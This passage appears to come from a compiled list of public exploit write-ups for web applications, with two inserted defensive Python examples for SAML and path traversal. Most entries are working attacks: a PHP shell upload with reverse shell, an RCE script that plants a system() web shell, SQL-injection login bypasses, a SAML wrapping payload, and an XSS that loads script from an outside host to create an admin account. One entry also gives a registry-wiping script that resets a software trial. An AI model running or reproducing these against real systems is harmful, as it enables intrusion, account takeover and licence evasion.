mauris. Quisque sit amet varius augue.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n"
          requests.post(url, headers=headers, cookies=cookies, data=data)
          print('[+]Success!')
          print('[+]Getting reverse shell')
          time.sleep(2)

      def RCE():
          path = 'http://'+site+'/vehicle_service/uploads/'
          html_text = requests.get(path).text
          soup = BeautifulSoup(html_text, 'html.parser')
          for link in soup.find_all('a'):
              data = link.get('href')
              if ".php" in data:
                  r = requests.get('http://'+site+'/vehicle_service/uploads/'+data)
                  print('[+]Pwned!')

      LoginAndShellUpload()
      RCE()
  14. # Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
      # Date: 30/9/2021
      # Exploit Author: Okan Kurtulus | okankurtulus.com.tr
      # Software Link: http://www.phpwcms.org/
      # Version: 1.9.30
      # Tested on: Ubuntu 16.04

      Steps:

      1-) You need to login to the system.
      http://target.com/phpwcms/login.php

      2-) Creating payload with SVG extension: payload.svg

      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
         <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
         <script type="text/javascript">
            alert("XSS!");
         </script>
      </svg>

      3-) Go to the following link and upload the payload:
      http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
      From the menu: file -> multiple file upload -> Select files or drop here

      4-) After uploading payload, call it from the link below.
      http://192.168.1.112/phpwcms/upload/
  15. # Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036

---

The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML Signature Wrapping Attacks that could allow an attacker to perform privilege escalation attacks.
In order to exploit the vulnerability, the plugin must be configured with the "Either SAML response or SAML assertion must be signed" option enabled and an empty "x509 certificate".

Administrator point of view:
- Install a Drupal version (for the PoC the version 9.1.10 has been used)
- Configure an external SSO system like Auth0
- Configure the plugin with the Auth0 provider by checking the "Either SAML response or SAML assertion must be signed" and empty "x509 certificate"

Attacker point of view:
- Register a normal user on the website
- Perform a login
- Intercept the request with Burp Suite and decode the SAMLResponse parameter
- Inject an additional <Saml:Assertion> object before the original one (example here: https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) (SAMLRaider Burp extension, XSW3 payload)

<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
  <saml:Subject>
    <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
    <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
      <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
    </saml:SubjectConfirmation>
  </saml:Subject>
  <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
    <saml:AudienceRestriction>
      <saml:Audience>http://localhost:8080</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>
  <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
    <saml:AuthnContext>
      <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
    </saml:AuthnContext>
  </saml:AuthnStatement>
  <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>
</saml:Assertion>

- Replace the username with one with higher privileges (like admin)
- Submit the request
- Successful exploitation
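The wrapping attack in the post succeeds when a service provider verifies a signature somewhere in the document and then reads the subject from the first assertion it finds, which is the unsigned one that was injected. The block below is an added defensive example, not code from the plugin, the advisory or the post, and it does not verify the signature itself (that stays with the SAML library); it demonstrates the binding check that closes the gap: there must be exactly one Assertion, its ID must be the target of a ds:Reference, and that ID must be unique. The function names, the SamlRejected exception and the trimmed sample response (with a placeholder SignatureValue) are constructed for this example.

```python
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Constructed, heavily trimmed signed assertion for test@example.com. The only ds:Signature in the
# response lives here and its Reference points at this assertion's ID; the value is a placeholder.
SIGNED_ASSERTION = """
  <saml:Assertion ID="_orig" Version="2.0">
    <ds:Signature>
      <ds:SignedInfo><ds:Reference URI="#_orig"/></ds:SignedInfo>
      <ds:SignatureValue>PLACEHOLDER-NOT-A-REAL-SIGNATURE</ds:SignatureValue>
    </ds:Signature>
    <saml:Subject><saml:NameID>test@example.com</saml:NameID></saml:Subject>
  </saml:Assertion>"""

# Constructed unsigned assertion in the style of the XSW3 payload above, claiming to be "admin".
INJECTED_ASSERTION = """
  <saml:Assertion ID="_evil_assertion_ID" Version="2.0">
    <saml:Subject><saml:NameID>admin</saml:NameID></saml:Subject>
  </saml:Assertion>"""


def build_response(*assertions):
    """Wrap the given assertion fragments, in order, in a minimal samlp:Response."""
    return ('<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
            'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
            'xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_resp">'
            + "".join(assertions) + "\n</samlp:Response>")


CLEAN_RESPONSE = build_response(SIGNED_ASSERTION)
WRAPPED_RESPONSE = build_response(INJECTED_ASSERTION, SIGNED_ASSERTION)  # injected one comes first


class SamlRejected(Exception):
    """Raised when the response cannot be bound to a signed assertion."""


def first_assertion_name_id(xml_text):
    """The weak pattern: trust whichever Assertion appears first in document order."""
    root = ET.fromstring(xml_text)
    return root.find(".//saml:Assertion/saml:Subject/saml:NameID", NS).text


def signed_ids(root):
    """IDs named by every ds:Reference, i.e. the elements a signature actually covers."""
    ids = set()
    for ref in root.iter("{%s}Reference" % NS["ds"]):
        uri = ref.get("URI", "")
        if uri.startswith("#"):
            ids.add(uri[1:])
    return ids


def trusted_name_id(xml_text):
    """Return the NameID of the one assertion the verifier may trust, or raise SamlRejected."""
    root = ET.fromstring(xml_text)
    assertions = root.findall("saml:Assertion", NS)      # direct children of the Response only
    if len(assertions) != 1:
        raise SamlRejected("expected exactly one Assertion, found %d" % len(assertions))
    assertion = assertions[0]
    aid = assertion.get("ID")
    if aid not in signed_ids(root):
        raise SamlRejected("Assertion %r is not covered by any signature Reference" % aid)
    # An ID a signature points at must be unique, otherwise a wrapper element could shadow it.
    if sum(1 for el in root.iter() if el.get("ID") == aid) != 1:
        raise SamlRejected("ID %r is not unique in the document" % aid)
    return assertion.find("saml:Subject/saml:NameID", NS).text


def is_rejected(xml_text):
    try:
        trusted_name_id(xml_text)
        return False
    except SamlRejected:
        return True


if __name__ == "__main__":
    print("weak check, wrapped response   ->", first_assertion_name_id(WRAPPED_RESPONSE))
    print("strict check, clean response   ->", trusted_name_id(CLEAN_RESPONSE))
    print("strict check, wrapped response ->", "rejected" if is_rejected(WRAPPED_RESPONSE) else "accepted")
```

The order matters: the signature must be verified over exactly the element whose ID the Reference names, and only that element's subject may be used afterwards. Reading the subject with a broad XPath such as //saml:Assertion after a successful verification is the defect the post exploits.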
  16. # Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows

# CMSimple_XH is an open source project under GPL3 license
# Includes an endpoint that allows remote access
# Backup page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# Example: python3 exploit.py -u http://example.com -p Admin123

from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
    parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()
    print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def host(args):
    # Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        sleep(2)
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass
    else:
        print("\n[?] Check Adress...\n")
        sleep(2)
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass

    # Check Host Status
    try:
        response = requests.get(args.host)
        if response.status_code == 200:
            login(args)
        else:
            print("[-] Address not reachable!")
            sleep(2)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)


def login(args):
    url = args.host + "/?&login"
    cookies = {
        "XH_2f": "evil"
    }
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?&login"
    }
    data = {
        "login": "true",
        "keycut": args.password,
        "submit": "Login"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    token = response.cookies.get("XH_2f")
    soup = BeautifulSoup(response.text, 'html.parser')
    if (soup.find("link", {"rel": "next"})['href'] != "/"):
        print("[!] Login Success!\n")
        sleep(2)
        csrf(args, token)
    else:
        print("[!] Wrong password!!\n")
        sleep(2)


def csrf(args, token):
    url = args.host + "/?file=content"
    cookies = {
        "status": "adm",
        "XH_2f": token
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?&settings",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close"
    }
    response = requests.get(url, headers=headers, cookies=cookies)
    try:
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf = soup.find_all("input", type="hidden")[3].get("value")
        create(args, token, csrf)
    except Exception as e:
        print(e)
    else:
        pass


def create(args, token, csrf):
    payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"
    url = args.host
    cookies = {
        "status": "adm",
        "XH_2f": token
    }
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?file=content&action=edit&xh_success=content",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "text": payload,
        "file": "content",
        "action": "save",
        "xh_csrf_token": csrf
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)
    if (response.status_code == 200):
        print("[!] Create Vuln File!\n")
        sleep(2)
        exploit(args)
    else:
        print("[!] Create Failed!\n")
        sleep(2)


def exploit(args):
    print("[+] Exploit Done!\n")
    sleep(2)
    while True:
        cmd = input("$ ")
        url = args.host + "/evil.php?cmd=" + cmd
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
        }
        response = requests.post(url, headers=headers, timeout=5)
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
  17. # Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381 https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Proof of Concept:

Step1: Open the browser check the version of the payara software
Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties
Step3: Check the response with match containing
"payara.security.openid.default.providerURI="
"payara.security.openid.sessionScopedConfiguration=true"
Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
Step5: Alternatively we can use CURL by using this command:

Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Reference:
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
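The request in the post reaches WEB-INF only because the raw path /.//WEB-INF/... is matched against resources before the empty and "." segments are collapsed. The block below is an added defensive example, not code from Payara or from the post: it normalizes a request path the way a compliant container resolves it (percent-decoding, slash unification, dot-segment removal) and flags any request that lands in WEB-INF or META-INF, which is the check a reverse proxy rule or a log review would apply. The function names and the access-log lines are constructed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

# Directory names a servlet container must never serve directly.
PROTECTED_DIRS = {"web-inf", "meta-inf"}

# Pulls the request path out of a common-log-format line.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize_request_path(raw_path):
    """Percent-decode twice (catches %252e double encoding), unify slashes and collapse '.' / '..'
    segments, so the result is the resource the container would actually resolve."""
    path = unquote(unquote(raw_path)).replace("\\", "/")
    path = path.split("?", 1)[0]                       # the query string plays no part in resolution
    return posixpath.normpath("/" + path.lstrip("/"))


def targets_protected_dir(raw_path):
    """True when the normalized path has a WEB-INF or META-INF segment anywhere (case-insensitive)."""
    segments = [s.lower() for s in normalize_request_path(raw_path).split("/") if s]
    return any(s in PROTECTED_DIRS for s in segments)


# Constructed access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2021:10:00:02 +0000] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 200 310',
    '10.0.0.9 - - [01/Oct/2021:10:00:03 +0000] "GET /%2e%2e/WEB-INF/web.xml HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/Oct/2021:10:00:04 +0000] "GET /webinfo/overview HTTP/1.1" 200 1024',
]


def flag_traversal_requests(lines):
    """Return (client, raw_path) for every request whose normalized path reaches a protected directory."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        raw = match.group(1)
        if targets_protected_dir(raw):
            hits.append((line.split()[0], raw))
    return hits


if __name__ == "__main__":
    for client, raw in flag_traversal_requests(SAMPLE_LOG):
        print(client, raw, "->", normalize_request_path(raw))
```

Note that the third line was answered with a 404 and still gets flagged: the point of normalizing before matching is to see the attempt regardless of whether that particular encoding worked against this build.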
  18. # Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-01
# Exploit Author: SUDONINJA
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to admin' or '1'='1 and password to dfsms
Step 5 – Click forward and now you will be logged in as admin.

POC

POST /dms/admin/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://localhost
Connection: close
Referer: http://localhost/dms/admin/
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
  19. # Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
# Date: 09.17.2021
# Exploit Author: Andreas Finstad (4ndr34z)
# Vendor Homepage: https://www.whatsupgold.com
# Version: v.21.0.3, Build 188
# Tested on: Windows 2019 Server
# CVE : CVE-2021-41318
# Reference: https://f20.be/cves/poc-cve-2021-41318

Description:
Improper validation of strings from discovered SNMP devices makes the application prone to stored XSS attacks. Placing an XSS payload in one of the fields reflected onto the application triggers the exploitation.
No CSRF protection/token on adding/posting a new user account makes it possible to create a rogue administrator, using a staged javascript delivered through the XSS.

SNMP
A nix computer placed on a subnet accessible from the server for discovery; you edit the SNMPd.conf, adding the payload:

# snmpd.conf
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See snmpd.conf(5) man page for details

############################################################################
# SECTION: System Information Setup
#
# syslocation: The [typically physical] location of the system.
#   Note that setting this value here means that when trying to
#   perform an snmp SET operation to the sysLocation.0 variable will make
#   the agent return the "notWritable" error code. IE, including
#   this token in the snmpd.conf file will disable write access to
#   the variable.
#   arguments: location_string

sysName Evil-Device
sysLocation Somewhere Over The Rainbow
sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>

This is the base64 encoded string:
var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a);

x.js:

var vhost = window.location.protocol+'\/\/'+window.location.host
var username = "sysadmin"
var password = "me"

fetch(vhost+'/NmConsole/api/core/WebUser',{
    method: 'POST',
    headers: {
        'Content-Length': '479',
        'Accept': 'application/json',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',
        'Content-Type': 'application/json',
        'Origin': vhost,
        'Referer': vhost+'/NmConsole/',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',
        'Connection': 'close'
    },
    credentials: 'include',
    body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups":[1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}'
});
  20. # Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-09-30
# Exploit Author: sanjay singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to admin' or '1'='1 and password to dfsms
Step 5 – Click forward and now you will be logged in as admin.

POC

POST /dfsms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/dfsms/index.php
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=dfsms&login=
  21. # Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : Password input is affected with authentication bypass because of improper sanitisation, which leads to access to unauthorised accounts.

#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.

# PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

# Authentication Bypass:
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>

Username: ' or 1 -- -
Password: ' or 1 -- -
  22. Navicat Premium is a great database management tool. Connect this tool to a database where you can see detailed information for various databases. This includes reporting errors, etc. Of course, you can also log in to the database through it and perform various operations. Navicat Premium is a multi-link database management tool that allows you to connect to MySQL, SQLite, Oracle and PostgreSQL databases simultaneously in one program, making it easier to manage different types of databases.

version
Navicat Premium 16.0.10

Download
Official website download address: https://www.navicat.com.cn/products/navicat-premium

New Features in Navicat Premium 16
1. Chart
Navicat 16 provides more data sources and chart support. We focus very much on improving usability and accessibility to provide vital information for your work.
2. Data generation
Data generation helps you create a large amount of test data. Lets you create complex data in multiple tables that are associated with each other.
3. On-Prem Server has now been added to our Navicat series. We provide you with the option to host cloud environments to store Navicat objects internally where you are.
4. Connect to the configuration file
Configure multiple connection profiles for outbound users, and connect settings can be switched according to the current location of the device used.
5. Productivity
Navicat 16 has numerous features and UI/UX improvements to meet your database development needs. Provides you with new ways to build, manage and maintain databases.

Installation Cracking
Navicat 16.0.10 currently has no registration machine, but we can use the method of clearing the registry to extend the probation period. Of course, you can also download the cracked version of other versions of 16.0.x.

The script is as follows:

@echo off
echo Delete HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium\Registration[version and language]
for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium' /s | findstr /L Registration'') do (
    reg delete %%i /va /f
)
echo.
echo Delete Info folder under HKEY_CURRENT_USER\Software\Classes\CLSID
for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\Classes\CLSID' /s | findstr /E Info'') do (
    reg delete %%i /va /f
)
echo.
echo Finish
pause

so when Navicat expires, we double-click the script. You can play happily again.
  23. # Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
